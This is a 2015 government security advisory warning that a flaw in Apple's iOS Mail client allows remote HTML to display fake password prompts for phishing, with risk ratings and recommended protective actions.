Vulnerability Found in Apple iOS can lead to Password Disclosure

ITS Advisory Number: 
2015-065
Date(s) Issued: 
Monday, June 15, 2015
Subject: 
Vulnerability Found in Apple iOS can lead to Password Disclosure
Overview: 

A vulnerability has been discovered in Apple's iOS mail client which could enable an attacker to load external HTML and easily carry out convincing phishing attacks on unsuspecting users. Several ID accounts are tied to many different applications within iOS including iCloud, Apple's AppStore as well as the user's iTunes account. Several others are present in third party applications. Successful exploitation of this vulnerability could result in the attacker harvesting any user account sought after.

Systems Affected: 
  • Apple iOS 8.0 and above
RISK
GOVERNMENT
Large and medium government entities: 
High
Small government entities: 
High
BUSINESS
Large and medium business entities: 
High
Small business entities: 
High
Home Users: 
High
Description: 

A vulnerability has been discovered in Apple's iOS mail client that can lead to a user giving up their Apple ID account. The vulnerability exploits a bug in the operating system's native email client to produce a realistic pop-up of which Apple users are accustomed to. Anyone with access to it can customize the attack to ask for whichever username and password credentials they feel the need for.

This vulnerability would allow remote HTML content to be loaded, replacing the content of the original email message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password collector using simple HTML and CSS.

As of the publishing of this advisory, this cannot be prevented with New York State's mobile device management platform. If you think an account has been compromised and would like assistance please call the New York State Cyber Security Operations Center at the number below.

Actions: 

We recommend the following actions be taken:

  • Do not enter credentials into the pop up box should you receive an email asking for it
  • If you think you were compromised immediately use Apple's password reset procedure to change your password.